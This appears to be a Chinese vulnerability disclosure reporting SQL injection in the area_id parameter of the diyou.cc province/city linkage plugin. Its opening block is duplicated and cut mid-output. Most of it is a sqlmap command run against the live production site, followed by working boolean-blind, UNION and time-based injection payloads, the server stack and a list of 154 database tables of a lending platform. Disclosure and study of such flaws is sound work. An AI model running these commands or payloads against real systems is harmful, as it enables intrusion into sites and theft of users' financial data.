### 简要描述: =。= ### 详细说明: 模块:省市信息联动插件(通杀V4.0,3.1) 基于后台读数据库出数据的省市信息联动插件,省市区变量直接转int即可! Location:./?plugins&q=areas&area_id=174 http://www.diyou.cc/?plugins&q=areas&area_id=174 GET参数area_id未有效过滤导致存在注入 通知存在注入点,未做进一步测试,赶紧赶紧赶紧修复! ``` python sqlmap.py -u "http://www.diyou.cc/?plugins&q=areas&area_id=174" -p "area_id" --batch --dbs --tables -D www.diyou.cc sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: area_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: plugins&q=areas&area_id=174 AND 8880=8880 Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: plugins&q=areas&area_id=174 UNION ALL SELECT NULL,CONCAT(0x7161706171,0x4e736851515370696e6d,0x7167616671),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: plugins&q=areas&area_id=174 AND SLEEP(5) --- web server operating system: Linux Debian 6.0...
### 简要描述: =。= ### 详细说明: 模块:省市信息联动插件(通杀V4.0,3.1) 基于后台读数据库出数据的省市信息联动插件,省市区变量直接转int即可! Location:./?plugins&q=areas&area_id=174 http://www.diyou.cc/?plugins&q=areas&area_id=174 GET参数area_id未有效过滤导致存在注入 通知存在注入点,未做进一步测试,赶紧赶紧赶紧修复! ``` python sqlmap.py -u "http://www.diyou.cc/?plugins&q=areas&area_id=174" -p "area_id" --batch --dbs --tables -D www.diyou.cc sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: area_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: plugins&q=areas&area_id=174 AND 8880=8880 Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: plugins&q=areas&area_id=174 UNION ALL SELECT NULL,CONCAT(0x7161706171,0x4e736851515370696e6d,0x7167616671),NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: plugins&q=areas&area_id=174 AND SLEEP(5) --- web server operating system: Linux Debian 6.0 (squeeze) web application technology: PHP 5.3.3, Apache 2.2.16 back-end DBMS: MySQL 5.0.11 available databases [2]: [*] information_schema [*] www.diyou.cc Database: www.diyou.cc [154 tables] +-----------------------------+ | diyou_account | | diyou_account_balance | | diyou_account_bank | | diyou_account_cash | | diyou_account_fee | | diyou_account_fee_type | | diyou_account_log | | diyou_account_payment | | diyou_account_recharge | | diyou_account_users | | diyou_account_users_bank | | diyou_account_web | | diyou_approve | | diyou_approve_edu | | diyou_approve_edu_id5 | | diyou_approve_id5 | | diyou_approve_realname | | diyou_approve_sms | | diyou_approve_smslog | | diyou_approve_video | | diyou_areas | | diyou_articles | | diyou_articles_pages | | diyou_articles_type | | diyou_attestations | | diyou_attestations_type | | diyou_attestations_user | | diyou_borrow | | diyou_borrow_activity | | diyou_borrow_amount | | diyou_borrow_amount_apply | | diyou_borrow_amount_log | | diyou_borrow_amount_type | | diyou_borrow_apply | | diyou_borrow_auto | | diyou_borrow_autolog | | diyou_borrow_care | | diyou_borrow_change | | diyou_borrow_count | | diyou_borrow_count_log | | diyou_borrow_credit | | diyou_borrow_fee | | diyou_borrow_fee_loan | | diyou_borrow_fee_log | | diyou_borrow_fee_type | | diyou_borrow_flag | | diyou_borrow_frost | | diyou_borrow_newtype | | diyou_borrow_preview | | diyou_borrow_recover | | diyou_borrow_repay | | diyou_borrow_roam | | diyou_borrow_style | | diyou_borrow_tender | | diyou_borrow_tender_auto | | diyou_borrow_tender_autolog | | diyou_borrow_tender_web | | diyou_borrow_type | | diyou_borrow_verify | | diyou_borrow_vouch | | diyou_borrow_vouch_recover | | diyou_borrow_vouch_repay | | diyou_comment | | diyou_comments | | diyou_credit | | diyou_credit_class | | diyou_credit_log | | diyou_credit_rank | | diyou_credit_type | | diyou_dw_activity_review | | diyou_email | | diyou_email_log | | diyou_email_port | | diyou_email_sendlog | | diyou_group | | diyou_group_articles | | diyou_group_comments | | diyou_group_log | | diyou_group_member | | diyou_group_type | | diyou_linkages | | diyou_linkages_class | | diyou_linkages_type | | diyou_links | | diyou_links_type | | diyou_message | | diyou_message_receive | | diyou_modules | | diyou_phone | | diyou_phone_log | | diyou_phone_port | | diyou_phone_smslog | | diyou_rating_assets | | diyou_rating_company | | diyou_rating_contact | | diyou_rating_educations | | diyou_rating_finance | | diyou_rating_houses | | diyou_rating_info | | diyou_rating_job | | diyou_remind | | diyou_remind_log | | diyou_remind_type | | diyou_remind_user | | diyou_scrollpic | | diyou_scrollpic_type | | diyou_site | | diyou_site_menu | | diyou_sms_type | | diyou_spread_add | | diyou_spread_log | | diyou_spreads_log | | diyou_spreads_set | | diyou_spreads_users | | diyou_sysauto_auto | | diyou_sysauto_log | | diyou_system | | diyou_system_type | | diyou_trust | | diyou_trust_borrow | | diyou_trust_cash | | diyou_trust_gopay | | diyou_trust_ips | | diyou_trust_recharge | | diyou_trust_repay | | diyou_trust_tender | | diyou_ucenter | | diyou_ucenter_set | | diyou_users | | diyou_users_admin | | diyou_users_admin_login | | diyou_users_admin_type | | diyou_users_adminlog | | diyou_users_care | | diyou_users_care_user | | diyou_users_email | | diyou_users_email_log | | diyou_users_examines | | diyou_users_friends | | diyou_users_friends_invite | | diyou_users_friends_type | | diyou_users_info | | diyou_users_log | | diyou_users_qq | | diyou_users_rebut | | diyou_users_reglog | | diyou_users_return_log | | diyou_users_set | | diyou_users_sina | | diyou_users_type | | diyou_users_upfiles | | diyou_users_vip | | diyou_users_viplog | | diyou_users_visit | +-----------------------------+ ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201405/14232611dc181aa672866709a8d326200c966b8d.jpg" alt="QQ图片20140514000027.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/14232611dc181aa672866709a8d326200c966b8d.jpg)
查看更多
